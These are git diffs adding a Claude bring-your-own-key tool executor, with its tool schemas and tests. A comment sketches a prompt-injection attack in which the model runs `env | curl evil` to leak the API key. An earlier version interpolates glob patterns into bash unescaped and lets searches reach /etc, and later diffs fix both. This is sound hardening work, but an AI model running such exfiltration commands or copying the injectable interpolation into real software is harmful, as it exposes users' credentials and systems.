+    const effectiveInput = decision.updatedInput || input
+    const { content, isError } = await executeBuiltinTool({
+      toolName,
+      input: effectiveInput,
+      cwd: this.cwd,
+      cwdRealCache: this._cwdRealCache,
+      cwdCacheTtl: CWD_CACHE_TTL_MS,
+      signal,
+    })
+
+    this.emit('tool_result', {
+      messageId,
+      toolUseId,
+      toolName,
+      result: content,
+      isError,
+    })
+
+    return {
+      type: 'tool_result',
+      tool_use_id: toolUseId,
+      content,
+      is_error: isError,
+    }
+  }
+
+  /**
+   * In-process permission response — called by ws-permissions.js when the
+   * user taps Approve/Deny on the phone or dashboard. Forwards to
+   * PermissionManager which resolves the pending Promise in
+   * handlePermission() above.
+   */
+  respondToPermission(requestId, decision) {
+    return this._permissions.respondToPermission(requestId, decision)
+  }
+
+  /**
+   * Response to an AskUserQuestion tool. Same forwarding pattern.
+   */
+  respondToQuestion(text, answersMap) {
+    this._permissions.respondToQuestion(text, answersMap)
+  }
+
+  /**
+   * Session-scoped permission rules (the dashboard's "Allow for Session"
+   * affordance, #3072). Optional method — providers.js's capability check
+   * uses presence to advertise sessionRules: true.
+   */
+  setPermissionRules(rules) {
+    if (typeof this._permissions.setRules === 'function') {
+      this._permissions.setRules(rules)
     }
   }
 
@@ -374,6 +530,22 @@ export class ClaudeByokSession extends BaseSession {
     if (this._destroying) return
     this._destroying = true
     this.interrupt()
+    // Reject any pending permission Promises so the dashboard doesn't
+    // hang. Same teardown pattern as sdk-session.js.
+    if (typeof this._permissions?.autoAllowPending !== 'function') {
+      // Older PermissionManager API — best-effort: leave pendings to be GC'd.
+    } else {
+      // PR 2: we deny on destroy (not auto-allow) to be defensive when
+      // the user closes the tab mid-prompt. Pending requests get a
+      // rejection so the loop above unblocks cleanly.
+      try {
+        for (const [requestId] of this._permissions._pendingPermissions) {
+          this._permissions.respondToPermission(requestId, { behavior: 'deny', message: 'Session destroyed' })
+        }
+      } catch (err) {
+        log.warn(`pending-permission teardown failed: ${err.message}`)
+      }
+    }
     this._history = []
     this._client = null
   }

--- a/packages/server/src/byok-session.js
+++ b/packages/server/src/byok-session.js
@@ -530,23 +530,18 @@ export class ClaudeByokSession extends BaseSession {
     if (this._destroying) return
     this._destroying = true
     this.interrupt()
-    // Reject any pending permission Promises so the dashboard doesn't
-    // hang. Same teardown pattern as sdk-session.js.
-    if (typeof this._permissions?.autoAllowPending !== 'function') {
-      // Older PermissionManager API — best-effort: leave pendings to be GC'd.
-    } else {
-      // PR 2: we deny on destroy (not auto-allow) to be defensive when
-      // the user closes the tab mid-prompt. Pending requests get a
-      // rejection so the loop above unblocks cleanly.
-      try {
-        for (const [requestId] of this._permissions._pendingPermissions) {
-          this._permissions.respondToPermission(requestId, { behavior: 'deny', message: 'Session destroyed' })
-        }
-      } catch (err) {
-        log.warn(`pending-permission teardown failed: ${err.message}`)
-      }
+    // Mirror sdk-session.js:1272-1300 teardown: PermissionManager owns
+    // its own destroy (which calls clearAll() and any internal timer
+    // cleanup), and removeAllListeners drops every EventEmitter
+    // subscription we registered on this session. Without these the
+    // process leaks listeners + timers per session destroyed.
+    try {
+      this._permissions?.destroy()
+    } catch (err) {
+      log.warn(`PermissionManager teardown failed: ${err.message}`)
     }
     this._history = []
     this._client = null
+    this.removeAllListeners()
   }
 }

--- a/packages/server/src/byok-tool-executor.js
+++ b/packages/server/src/byok-tool-executor.js
@@ -1,0 +1,260 @@
+/**
+ * Dispatch a tool_use block from the model to the local executor that
+ * implements it. Owns the result shape: returns `{ content, isError }`
+ * matching what gets put inside a `tool_result` content block sent
+ * back to the API on the next turn.
+ *
+ * All tools are gated through the caller's permission flow before this
+ * runs — by the time we get here, the user has approved the call (or
+ * the session is in `auto` mode which auto-approves). We don't do
+ * permission gating in here; this module is execution only.
+ *
+ * Path safety is enforced for file tools by validatePathWithinCwd from
+ * ws-file-ops/common.js — every file_path is realpath-ed and confirmed
+ * to be inside the session cwd before any read/write happens. Symlink
+ * escapes are blocked by the realpath-of-deepest-ancestor pattern there
+ * (see common.js + the 2026-04-11 production-readiness audit).
+ */
+
+import { resolve, isAbsolute } from 'node:path'
+import { validatePathWithinCwd } from './ws-file-ops/common.js'
+import { executeBash, DEFAULT_BASH_TIMEOUT_MS } from './built-in-tools/bash-exec.js'
+import { readFileTool, writeFileTool, editFileTool } from './built-in-tools/file-ops.js'
+
+/**
+ * Cap on Bash timeout the model can request. 10 minutes is the same
+ * ceiling chroxy's Bash tool uses elsewhere — long enough for a slow
+ * test suite, short enough to not strand a session if a runaway loop
+ * hangs.
+ */
+const BASH_TIMEOUT_CEILING_MS = 600_000
+
+/**
+ * Dispatch a single tool_use block.
+ *
+ * @param {object} args
+ * @param {string} args.toolName       The tool name from the model
+ * @param {object} args.input          The tool's input arguments (already parsed JSON)
+ * @param {string} args.cwd            Session cwd — anchor for path safety
+ * @param {Map} args.cwdRealCache      Per-session cache of resolved real paths
+ * @param {number} args.cwdCacheTtl    Cache TTL in ms
+ * @param {AbortSignal} [args.signal]  Optional abort signal — Bash exec listens
+ * @returns {Promise<{ content: string, isError: boolean }>}
+ */
+export async function executeBuiltinTool({
+  toolName,
+  input,
+  cwd,
+  cwdRealCache,
+  cwdCacheTtl,
+  signal,
+}) {
+  try {
+    switch (toolName) {
+      case 'Read':
+        return await runRead({ input, cwd, cwdRealCache, cwdCacheTtl })
+      case 'Write':
+        return await runWrite({ input, cwd, cwdRealCache, cwdCacheTtl })
+      case 'Edit':
+        return await runEdit({ input, cwd, cwdRealCache, cwdCacheTtl })
+      case 'Bash':
+        return await runBash({ input, cwd, signal })
+      case 'Glob':
+        return await runGlob({ input, cwd, signal })
+      case 'Grep':
+        return await runGrep({ input, cwd, signal })
+      default:
+        return {
+          content: `Unknown tool: ${toolName}. The claude-byok provider ships with: Read, Write, Edit, Bash, Glob, Grep. MCP and other tools land in follow-up issues.`,
+          isError: true,
+        }
+    }
+  } catch (err) {
+    // Anything that escapes the per-tool runner becomes an error
+    // tool_result so the model can see what went wrong and possibly
+    // recover. The error message is sanitized — no stack traces, just
+    // the error message line.
+    return {
+      content: `Tool ${toolName} failed: ${err?.message || String(err)}`,
+      isError: true,
+    }
+  }
+}
+
+/** Resolve a tool-supplied path against cwd, then validate it's inside. */
+async function safeResolve(filePath, cwd, cwdRealCache, cwdCacheTtl) {
+  if (typeof filePath !== 'string' || filePath.length === 0) {
+    throw Object.assign(new Error('file_path is required'), { code: 'EINVAL' })
+  }
+  const absolute = isAbsolute(filePath) ? filePath : resolve(cwd, filePath)
+  const { valid, realPath, cwdReal } = await validatePathWithinCwd(
+    absolute,
+    cwd,
+    cwdRealCache,
+    cwdCacheTtl,
+  )
+  if (!valid) {
+    throw Object.assign(
+      new Error(`path outside workspace: ${filePath} resolves to ${realPath}, expected under ${cwdReal}`),
+      { code: 'EACCES' },
+    )
+  }
+  return realPath
+}
+
+async function runRead({ input, cwd, cwdRealCache, cwdCacheTtl }) {
+  const realPath = await safeResolve(input?.file_path, cwd, cwdRealCache, cwdCacheTtl)
+  const result = await readFileTool({
+    filePath: realPath,
+    offset: input?.offset,
+    limit: input?.limit,
+  })
+  if (!result.ok) return { content: `${result.code}: ${result.message}`, isError: true }
+  const tail = result.truncatedByLimit
+    ? `\n\n[showed ${result.linesReturned} of ${result.totalLines} lines]`
+    : ''
+  return { content: result.content + tail, isError: false }
+}
+
+async function runWrite({ input, cwd, cwdRealCache, cwdCacheTtl }) {
+  const realPath = await safeResolve(input?.file_path, cwd, cwdRealCache, cwdCacheTtl)
+  const result = await writeFileTool({
+    filePath: realPath,
+    content: input?.content,
+  })
+  if (!result.ok) return { content: `${result.code}: ${result.message}`, isError: true }
+  return {
+    content: `Wrote ${result.bytesWritten} bytes to ${input.file_path}${result.created ? ' (created)' : ''}.`,
+    isError: false,
+  }
+}
+
+async function runEdit({ input, cwd, cwdRealCache, cwdCacheTtl }) {
+  const realPath = await safeResolve(input?.file_path, cwd, cwdRealCache, cwdCacheTtl)
+  const result = await editFileTool({
+    filePath: realPath,
+    oldString: input?.old_string,
+    newString: input?.new_string,
+    replaceAll: input?.replace_all === true,
+  })
+  if (!result.ok) return { content: `${result.code}: ${result.message}`, isError: true }
+  return {
+    content: `Replaced ${result.replacements} occurrence(s) in ${input.file_path}.`,
+    isError: false,
+  }
+}
+
+async function runBash({ input, cwd, signal }) {
+  const command = input?.command
+  if (typeof command !== 'string' || command.length === 0) {
+    return { content: 'EINVAL: command is required', isError: true }
+  }
+  const requested = Number(input?.timeout)
+  const timeoutMs = Number.isFinite(requested) && requested > 0
+    ? Math.min(requested, BASH_TIMEOUT_CEILING_MS)
+    : DEFAULT_BASH_TIMEOUT_MS
+
+  const result = await executeBash({ command, cwd, timeoutMs, signal })
+
+  // Build a single text payload — stdout, then stderr (if any), then a
+  // status line. The model is the consumer here, so we err on the side
+  // of being verbose about timing and exit state.
+  const parts = []
+  if (result.stdout) parts.push(`stdout:\n${result.stdout}`)
+  if (result.stderr) parts.push(`stderr:\n${result.stderr}`)
+  const statusBits = []
+  if (result.timedOut) statusBits.push(`timed out after ${timeoutMs}ms`)
+  if (result.aborted) statusBits.push('aborted')
+  if (result.truncated) statusBits.push('output truncated at cap')
+  statusBits.push(`exit=${result.exitCode ?? 'killed'}`)
+  if (result.signal) statusBits.push(`signal=${result.signal}`)
+  statusBits.push(`${result.durationMs}ms`)
+  parts.push(`[${statusBits.join(', ')}]`)
+
+  return {
+    content: parts.join('\n\n'),
+    isError: result.exitCode !== 0 || result.timedOut || result.aborted,
+  }
+}
+
+async function runGlob({ input, cwd, signal }) {
+  const pattern = input?.pattern
+  if (typeof pattern !== 'string' || pattern.length === 0) {
+    return { content: 'EINVAL: pattern is required', isError: true }
+  }
+  const root = typeof input?.path === 'string' && input.path.length > 0
+    ? input.path
+    : cwd
+
+  // Shell out with globstar so `**` works. Quoting the pattern via $'..'
+  // would defeat expansion — we want bash to expand it. The pattern is
+  // passed as a literal arg (with the safe-resolve below ensuring the
+  // root stays inside the workspace before bash even sees it).
+  //
+  // We do the safety check on the search ROOT, not on the pattern, since
+  // shell expansion is what produces the actual file paths.
+  await safeResolveOptional(root, cwd, signal)
+
+  const cmd = `shopt -s globstar nullglob; cd ${shellQuote(root)} && for f in ${pattern}; do printf '%s\\n' "$f"; done`
+  const result = await executeBash({ command: cmd, cwd: root, signal, timeoutMs: 30_000 })
+  if (result.exitCode !== 0 && !result.stdout) {
+    return { content: `Glob failed: ${result.stderr || `exit ${result.exitCode}`}`, isError: true }
+  }
+  const files = result.stdout.split('\n').filter(Boolean)
+  if (files.length === 0) return { content: `No matches for ${pattern}`, isError: false }
+  return { content: files.join('\n'), isError: false }
+}
+
+async function runGrep({ input, cwd, signal }) {
+  const pattern = input?.pattern
+  if (typeof pattern !== 'string' || pattern.length === 0) {
+    return { content: 'EINVAL: pattern is required', isError: true }
+  }
+  const root = typeof input?.path === 'string' && input.path.length > 0
+    ? input.path
+    : cwd
+  await safeResolveOptional(root, cwd, signal)
+
+  // Prefer ripgrep; fall back to grep. Both honor -i and -n.
+  const ci = input?.['-i'] === true ? '-i' : ''
+  const ln = input?.['-n'] !== false ? '-n' : ''
+  const globArg = typeof input?.glob === 'string' && input.glob.length > 0
+    ? ` --glob ${shellQuote(input.glob)}` : ''
+
+  // Try rg first. If it's not installed (command not found, exit 127),
+  // retry with grep -r. Either way the output is `path:lineno:content`.
+  const tryRg = `command -v rg >/dev/null 2>&1 && rg ${ci} ${ln} --no-heading${globArg} ${shellQuote(pattern)} ${shellQuote(root)}`
+  const tryGrep = `grep -r ${ci} ${ln} ${shellQuote(pattern)} ${shellQuote(root)}`
+  const cmd = `(${tryRg}) || (${tryGrep})`
+
+  const result = await executeBash({ command: cmd, cwd: root, signal, timeoutMs: 60_000 })
+  // grep/rg both return exit 1 on "no matches" — that's not an error
+  // for our purposes. Only exit 2+ or stderr-without-stdout signals an
+  // actual failure.
+  if (result.stderr && !result.stdout && result.exitCode !== 1) {
+    return { content: `Grep failed: ${result.stderr.trim()}`, isError: true }
+  }
+  if (!result.stdout) return { content: `No matches for ${pattern}`, isError: false }
+  return { content: result.stdout, isError: false }
+}
+
+async function safeResolveOptional(p, _cwd, _signal) {
+  if (typeof p !== 'string' || p.length === 0) return
+  // Light path safety on the root — we don't realpath here because the
+  // shell expansion happens inside the spawned bash anyway, but we
+  // reject obvious escapes (.., ~ unexpanded).
+  const trimmed = p.trim()
+  if (trimmed.startsWith('..') || trimmed.includes('/..')) {
+    throw Object.assign(new Error(`path may not contain ..`), { code: 'EACCES' })
+  }
+}
+
+/**
+ * Quote a string for inclusion in a `bash -c` command. Uses single-quote
+ * shell escaping which is the safest form (no expansion at all inside).
+ * Embedded single quotes are escaped as `'\''`.
+ */
+function shellQuote(s) {
+  if (typeof s !== 'string') return "''"
+  return `'${s.replace(/'/g, `'\\''`)}'`
+}

--- a/packages/server/src/byok-tool-executor.js
+++ b/packages/server/src/byok-tool-executor.js
@@ -30,6 +30,36 @@ import { readFileTool, writeFileTool, editFileTool } from './built-in-tools/file
 const BASH_TIMEOUT_CEILING_MS = 600_000
 
 /**
+ * Env vars the model must NEVER see in a Bash subprocess. Centrally
+ * the BYOK API key — if a malicious prompt induces the model to run
+ * `env | curl evil`, the model exfiltrates the user's API credentials
+ * (caught by /agent-review on PR #4060 — see #4069). Plus chroxy's
+ * own per-session secrets that are scoped to the WS auth surface.
+ *
+ * Note: we do NOT redact every var that looks like a secret (e.g.
+ * GITHUB_TOKEN, AWS_*). The user might legitimately need those in
+ * their shell — they're the workspace owner. Only redact chroxy-
+ * specific credentials the model has no business reading.
+ */
+const SECRET_ENV_DENYLIST = new Set([
+  'ANTHROPIC_API_KEY',
+  'CLAUDE_CODE_OAUTH_TOKEN',
+])
+
+/**
+ * Build an env for the Bash/Glob/Grep subprocess that strips chroxy's
+ * own secrets. Returns a plain object — pass to executeBash's `env`.
+ */
+function buildSafeBashEnv() {
+  const out = {}
+  for (const [k, v] of Object.entries(process.env)) {
+    if (SECRET_ENV_DENYLIST.has(k)) continue
+    out[k] = v
+  }
+  return out
+}
+
+/**
  * Dispatch a single tool_use block.
  *
  * @param {object} args
@@ -60,9 +90,9 @@ export async function executeBuiltinTool({
       case 'Bash':
         return await runBash({ input, cwd, signal })
       case 'Glob':
-        return await runGlob({ input, cwd, signal })
+        return await runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal })
       case 'Grep':
-        return await runGrep({ input, cwd, signal })
+        return await runGrep({ input, cwd, cwdRealCache, cwdCacheTtl, signal })
       default:
         return {
           content: `Unknown tool: ${toolName}. The claude-byok provider ships with: Read, Write, Edit, Bash, Glob, Grep. MCP and other tools land in follow-up issues.`,
@@ -154,7 +184,13 @@ async function runBash({ input, cwd, signal }) {
     ? Math.min(requested, BASH_TIMEOUT_CEILING_MS)
     : DEFAULT_BASH_TIMEOUT_MS
 
-  const result = await executeBash({ command, cwd, timeoutMs, signal })
+  const result = await executeBash({
+    command,
+    cwd,
+    timeoutMs,
+    signal,
+    env: buildSafeBashEnv(),
+  })
 
   // Build a single text payload — stdout, then stderr (if any), then a
   // status line. The model is the consumer here, so we err on the side
@@ -177,26 +213,40 @@ async function runBash({ input, cwd, signal }) {
   }
 }
 
-async function runGlob({ input, cwd, signal }) {
+// Characters in a glob pattern that allow shell-side command substitution
+// or piping. Glob patterns legitimately need *, ?, [], {}, /, ., alnum,
+// _, and -. They never need any of these. Refuse them to prevent the
+// "for f in <pattern>" interpolation from running an attacker payload
+// (caught by /agent-review on PR #4060 — see #4070).
+const GLOB_PATTERN_SHELL_METACHARS = /[$`;|&><()\\\n\r]/
+
+async function runGlob({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
   const pattern = input?.pattern
   if (typeof pattern !== 'string' || pattern.length === 0) {
     return { content: 'EINVAL: pattern is required', isError: true }
   }
-  const root = typeof input?.path === 'string' && input.path.length > 0
-    ? input.path
-    : cwd
+  if (GLOB_PATTERN_SHELL_METACHARS.test(pattern)) {
+    return {
+      content: 'EINVAL: glob pattern contains shell-dangerous characters ($, `, ;, |, &, <, >, (, ), \\, newline)',
+      isError: true,
+    }
+  }
 
-  // Shell out with globstar so `**` works. Quoting the pattern via $'..'
-  // would defeat expansion — we want bash to expand it. The pattern is
-  // passed as a literal arg (with the safe-resolve below ensuring the
-  // root stays inside the workspace before bash even sees it).
-  //
-  // We do the safety check on the search ROOT, not on the pattern, since
-  // shell expansion is what produces the actual file paths.
-  await safeResolveOptional(root, cwd, signal)
+  // Realpath-validate the search ROOT against cwd. Pre-fix this was a
+  // weak "no ..." check that let absolute paths to /etc through.
+  const realRoot = await safeResolveRoot(input?.path, cwd, cwdRealCache, cwdCacheTtl)
 
-  const cmd = `shopt -s globstar nullglob; cd ${shellQuote(root)} && for f in ${pattern}; do printf '%s\\n' "$f"; done`
-  const result = await executeBash({ command: cmd, cwd: root, signal, timeoutMs: 30_000 })
+  // Shell expansion of `for f in <pattern>` is what produces the file
+  // paths. Pattern is now whitelist-validated above, so interpolation
+  // is safe.
+  const cmd = `shopt -s globstar nullglob; cd ${shellQuote(realRoot)} && for f in ${pattern}; do printf '%s\\n' "$f"; done`
+  const result = await executeBash({
+    command: cmd,
+    cwd: realRoot,
+    signal,
+    timeoutMs: 30_000,
+    env: buildSafeBashEnv(),
+  })
   if (result.exitCode !== 0 && !result.stdout) {
     return { content: `Glob failed: ${result.stderr || `exit ${result.exitCode}`}`, isError: true }
   }
@@ -205,15 +255,12 @@ async function runGlob({ input, cwd, signal }) {
   return { content: files.join('\n'), isError: false }
 }
 
-async function runGrep({ input, cwd, signal }) {
+async function runGrep({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
   const pattern = input?.pattern
   if (typeof pattern !== 'string' || pattern.length === 0) {
     return { content: 'EINVAL: pattern is required', isError: true }
   }
-  const root = typeof input?.path === 'string' && input.path.length > 0
-    ? input.path
-    : cwd
-  await safeResolveOptional(root, cwd, signal)
+  const realRoot = await safeResolveRoot(input?.path, cwd, cwdRealCache, cwdCacheTtl)
 
   // Prefer ripgrep; fall back to grep. Both honor -i and -n.
   const ci = input?.['-i'] === true ? '-i' : ''
@@ -223,11 +270,17 @@ async function runGrep({ input, cwd, signal }) {
 
   // Try rg first. If it's not installed (command not found, exit 127),
   // retry with grep -r. Either way the output is `path:lineno:content`.
-  const tryRg = `command -v rg >/dev/null 2>&1 && rg ${ci} ${ln} --no-heading${globArg} ${shellQuote(pattern)} ${shellQuote(root)}`
-  const tryGrep = `grep -r ${ci} ${ln} ${shellQuote(pattern)} ${shellQuote(root)}`
+  const tryRg = `command -v rg >/dev/null 2>&1 && rg ${ci} ${ln} --no-heading${globArg} ${shellQuote(pattern)} ${shellQuote(realRoot)}`
+  const tryGrep = `grep -r ${ci} ${ln} ${shellQuote(pattern)} ${shellQuote(realRoot)}`
   const cmd = `(${tryRg}) || (${tryGrep})`
 
-  const result = await executeBash({ command: cmd, cwd: root, signal, timeoutMs: 60_000 })
+  const result = await executeBash({
+    command: cmd,
+    cwd: realRoot,
+    signal,
+    timeoutMs: 60_000,
+    env: buildSafeBashEnv(),
+  })
   // grep/rg both return exit 1 on "no matches" — that's not an error
   // for our purposes. Only exit 2+ or stderr-without-stdout signals an
   // actual failure.
@@ -238,15 +291,34 @@ async function runGrep({ input, cwd, signal }) {
   return { content: result.stdout, isError: false }
 }
 
-async function safeResolveOptional(p, _cwd, _signal) {
-  if (typeof p !== 'string' || p.length === 0) return
-  // Light path safety on the root — we don't realpath here because the
-  // shell expansion happens inside the spawned bash anyway, but we
-  // reject obvious escapes (.., ~ unexpanded).
-  const trimmed = p.trim()
-  if (trimmed.startsWith('..') || trimmed.includes('/..')) {
-    throw Object.assign(new Error(`path may not contain ..`), { code: 'EACCES' })
+/**
+ * Validate that an optional `path` argument (for Glob/Grep search roots)
+ * is inside the workspace cwd. Defaults to cwd when unset/empty. Returns
+ * the realpath so the caller can pass it to bash safely (the spawned
+ * shell uses the realpath, not the original symlinked alias).
+ *
+ * SECURITY: an earlier draft of this function only rejected literal `..`
+ * sequences, which let `Glob { path: '/etc' }` and `Grep { path: '/etc' }`
+ * search the entire filesystem and return /etc/passwd etc. Caught by
+ * `/agent-review` on PR #4060 — see #4071. Now realpath-validates the
+ * path through the same machinery the Read/Write/Edit tools use.
+ */
+async function safeResolveRoot(p, cwd, cwdRealCache, cwdCacheTtl) {
+  if (typeof p !== 'string' || p.length === 0) return cwd
+  const absolute = isAbsolute(p) ? p : resolve(cwd, p)
+  const { valid, realPath, cwdReal } = await validatePathWithinCwd(
+    absolute,
+    cwd,
+    cwdRealCache,
+    cwdCacheTtl,
+  )
+  if (!valid) {
+    throw Object.assign(
+      new Error(`path outside workspace: ${p} resolves to ${realPath}, expected under ${cwdReal}`),
+      { code: 'EACCES' },
+    )
   }
+  return realPath
 }
 
 /**

--- a/packages/server/src/byok-tool-executor.js
+++ b/packages/server/src/byok-tool-executor.js
@@ -268,11 +268,14 @@ async function runGrep({ input, cwd, cwdRealCache, cwdCacheTtl, signal }) {
   const globArg = typeof input?.glob === 'string' && input.glob.length > 0
     ? ` --glob ${shellQuote(input.glob)}` : ''
 
-  // Try rg first. If it's not installed (command not found, exit 127),
-  // retry with grep -r. Either way the output is `path:lineno:content`.
-  const tryRg = `command -v rg >/dev/null 2>&1 && rg ${ci} ${ln} --no-heading${globArg} ${shellQuote(pattern)} ${shellQuote(realRoot)}`
-  const tryGrep = `grep -r ${ci} ${ln} ${shellQuote(pattern)} ${shellQuote(realRoot)}`
-  const cmd = `(${tryRg}) || (${tryGrep})`
+  // Pick rg if available, else grep -r. Pre-fix this was `rg || grep`
+  // which re-ran the search with grep on the COMMON no-match case
+  // (rg exits 1 on no matches → `||` triggers grep), doubling work
+  // (Copilot review on #4060). Use if/then/else so grep only runs
+  // when rg is truly unavailable.
+  const rgCmd = `rg ${ci} ${ln} --no-heading${globArg} ${shellQuote(pattern)} ${shellQuote(realRoot)}`
+  const grepCmd = `grep -r ${ci} ${ln} ${shellQuote(pattern)} ${shellQuote(realRoot)}`
+  const cmd = `if command -v rg >/dev/null 2>&1; then ${rgCmd}; else ${grepCmd}; fi`
 
   const result = await executeBash({
     command: cmd,

--- a/packages/server/src/byok-tools.js
+++ b/packages/server/src/byok-tools.js
@@ -1,0 +1,123 @@
+/**
+ * Tool definitions for the claude-byok provider.
+ *
+ * Schemas match Claude Code's documented input shapes so the model sees
+ * a consistent interface across providers — switching from claude-cli /
+ * claude-tui / claude-sdk to claude-byok shouldn't require the model to
+ * relearn tool calling.
+ *
+ * These are passed verbatim into `client.messages.stream({ tools })` —
+ * the SDK consumes them as Anthropic API tool definitions.
+ *
+ * Deferred to follow-up issues (see #4047 epic):
+ *   - WebFetch — #4050
+ *   - TodoWrite — #4051
+ *   - Task (subagent) — #4049
+ *   - MCP — #4048
+ */
+
+export const BUILTIN_TOOLS = [
+  {
+    name: 'Read',
+    description:
+      'Read a text file from the workspace. Returns line-numbered content. ' +
+      'Optionally read a slice via `offset` (1-indexed start line) and `limit` (max lines to return). ' +
+      'Refuses binary files. Use the Glob tool to discover paths first if unsure.',
+    input_schema: {
+      type: 'object',
+      properties: {
+        file_path: { type: 'string', description: 'Absolute or workspace-relative path to read.' },
+        offset: { type: 'number', description: 'Optional 1-indexed start line.' },
+        limit: { type: 'number', description: 'Optional max number of lines to return (default 2000).' },
+      },
+      required: ['file_path'],
+    },
+  },
+  {
+    name: 'Write',
+    description:
+      'Write a file, truncating any existing content. Creates the file and any missing parent ' +
+      'directories. Returns the number of bytes written and whether the file is new.',
+    input_schema: {
+      type: 'object',
+      properties: {
+        file_path: { type: 'string', description: 'Absolute or workspace-relative path to write.' },
+        content: { type: 'string', description: 'New file content.' },
+      },
+      required: ['file_path', 'content'],
+    },
+  },
+  {
+    name: 'Edit',
+    description:
+      'Replace `old_string` with `new_string` in a file. Refuses if `old_string` matches multiple ' +
+      'sites (pass `replace_all: true` to override) or matches zero sites. Add surrounding context ' +
+      'to `old_string` to disambiguate when needed.',
+    input_schema: {
+      type: 'object',
+      properties: {
+        file_path: { type: 'string', description: 'Absolute or workspace-relative path to edit.' },
+        old_string: { type: 'string', description: 'Exact substring to replace. Must be unique unless replace_all is true.' },
+        new_string: { type: 'string', description: 'Replacement substring.' },
+        replace_all: { type: 'boolean', description: 'Replace every occurrence instead of refusing on multi-match.' },
+      },
+      required: ['file_path', 'old_string', 'new_string'],
+    },
+  },
+  {
+    name: 'Bash',
+    description:
+      'Run a shell command via `bash -c`. Returns stdout, stderr, exit code. Timeout default ' +
+      '30s (override via `timeout`, max 600s). Output capped at ~1MB total — exceeding the cap ' +
+      'kills the process. Use for build/test/git operations and one-off shell pipelines.',
+    input_schema: {
+      type: 'object',
+      properties: {
+        command: { type: 'string', description: 'Full shell command to run via `bash -c`.' },
+        description: { type: 'string', description: 'Short human-readable summary of what the command does.' },
+        timeout: { type: 'number', description: 'Optional timeout in milliseconds. Max 600000 (10 min).' },
+      },
+      required: ['command'],
+    },
+  },
+  {
+    name: 'Glob',
+    description:
+      'List files matching a glob pattern. Pattern is shell-style (e.g. `**/*.ts`, `packages/server/src/*.js`). ' +
+      '`path` is the search root (default: workspace cwd). Returns file paths relative to the search root.',
+    input_schema: {
+      type: 'object',
+      properties: {
+        pattern: { type: 'string', description: 'Glob pattern (supports ** for recursive match).' },
+        path: { type: 'string', description: 'Optional search root. Defaults to workspace cwd.' },
+      },
+      required: ['pattern'],
+    },
+  },
+  {
+    name: 'Grep',
+    description:
+      'Search file contents for a regex pattern using ripgrep when available. ' +
+      'Returns matching lines with file path + line number. `path` narrows the scope. ' +
+      '`glob` further filters by filename pattern (e.g. `*.js`).',
+    input_schema: {
+      type: 'object',
+      properties: {
+        pattern: { type: 'string', description: 'Regex pattern (PCRE-style via ripgrep when available).' },
+        path: { type: 'string', description: 'Optional search root. Defaults to workspace cwd.' },
+        glob: { type: 'string', description: 'Optional filename glob to filter matched files.' },
+        '-i': { type: 'boolean', description: 'Case-insensitive match.' },
+        '-n': { type: 'boolean', description: 'Include line numbers (default true).' },
+      },
+      required: ['pattern'],
+    },
+  },
+]
+
+/**
+ * The set of tool names this provider knows how to execute locally.
+ * Models that emit a tool_use for a name NOT in this set produce a
+ * tool_result with `is_error: true` and a clear message so the chain
+ * doesn't silently hang.
+ */
+export const BUILTIN_TOOL_NAMES = new Set(BUILTIN_TOOLS.map((t) => t.name))

--- a/packages/server/tests/built-in-tools/bash-exec.test.js
+++ b/packages/server/tests/built-in-tools/bash-exec.test.js
@@ -1,0 +1,78 @@
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { executeBash } from '../../src/built-in-tools/bash-exec.js'
+
+/**
+ * Tests for built-in-tools/bash-exec.js — basic exec, timeout, abort,
+ * output cap, exit code reporting. Pulled into its own file because
+ * other built-in tools (Glob, Grep) shell out via this helper.
+ */
+
+describe('executeBash', () => {
+  it('captures stdout from a simple command', async () => {
+    const r = await executeBash({ command: 'echo hello world' })
+    assert.equal(r.exitCode, 0)
+    assert.equal(r.stdout.trim(), 'hello world')
+    assert.equal(r.stderr, '')
+    assert.equal(r.timedOut, false)
+    assert.equal(r.aborted, false)
+  })
+
+  it('captures stderr separately from stdout', async () => {
+    const r = await executeBash({ command: 'echo out; echo err >&2' })
+    assert.match(r.stdout, /out/)
+    assert.match(r.stderr, /err/)
+  })
+
+  it('reports non-zero exit code', async () => {
+    const r = await executeBash({ command: 'exit 42' })
+    assert.equal(r.exitCode, 42)
+    assert.equal(r.timedOut, false)
+  })
+
+  it('honors cwd', async () => {
+    const r = await executeBash({ command: 'pwd', cwd: '/tmp' })
+    // macOS realpaths /tmp → /private/tmp; both are acceptable. Just
+    // assert the result is one of them.
+    assert.ok(['/tmp', '/private/tmp'].includes(r.stdout.trim()),
+      `expected /tmp or /private/tmp, got: ${r.stdout.trim()}`)
+  })
+
+  it('times out and kills a long-running process', async () => {
+    const r = await executeBash({ command: 'sleep 5', timeoutMs: 200 })
+    assert.equal(r.timedOut, true)
+    // The process should be killed before completing. exitCode may be
+    // null (signal kill) or non-zero. Just assert duration is well
+    // below the sleep target.
+    assert.ok(r.durationMs < 4000, `expected fast kill, got ${r.durationMs}ms`)
+  })
+
+  it('aborts via AbortSignal', async () => {
+    const ctrl = new AbortController()
+    setTimeout(() => ctrl.abort(), 50)
+    const r = await executeBash({ command: 'sleep 5', signal: ctrl.signal, timeoutMs: 30_000 })
+    assert.equal(r.aborted, true)
+    assert.ok(r.durationMs < 3000, `expected fast abort kill, got ${r.durationMs}ms`)
+  })
+
+  it('caps output bytes and marks truncated', async () => {
+    // Generate ~2KB of output; cap at 100B. Should truncate.
+    const r = await executeBash({
+      command: 'yes A | head -c 2048',
+      maxOutputBytes: 100,
+      timeoutMs: 5000,
+    })
+    assert.equal(r.truncated, true)
+    assert.ok(r.stdout.length <= 100, `expected output <=100B, got ${r.stdout.length}`)
+  })
+
+  it('rejects empty command', async () => {
+    await assert.rejects(() => executeBash({ command: '' }), /non-empty string/)
+    await assert.rejects(() => executeBash({ command: null }), /non-empty string/)
+  })
+
+  it('rejects non-positive timeout', async () => {
+    await assert.rejects(() => executeBash({ command: 'echo x', timeoutMs: 0 }), /positive number/)
+    await assert.rejects(() => executeBash({ command: 'echo x', timeoutMs: -5 }), /positive number/)
+  })
+})

--- a/packages/server/tests/built-in-tools/file-ops.test.js
+++ b/packages/server/tests/built-in-tools/file-ops.test.js
@@ -1,0 +1,136 @@
+import { describe, it, beforeEach, afterEach } from 'node:test'
+import assert from 'node:assert/strict'
+import { mkdtempSync, writeFileSync, rmSync } from 'node:fs'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
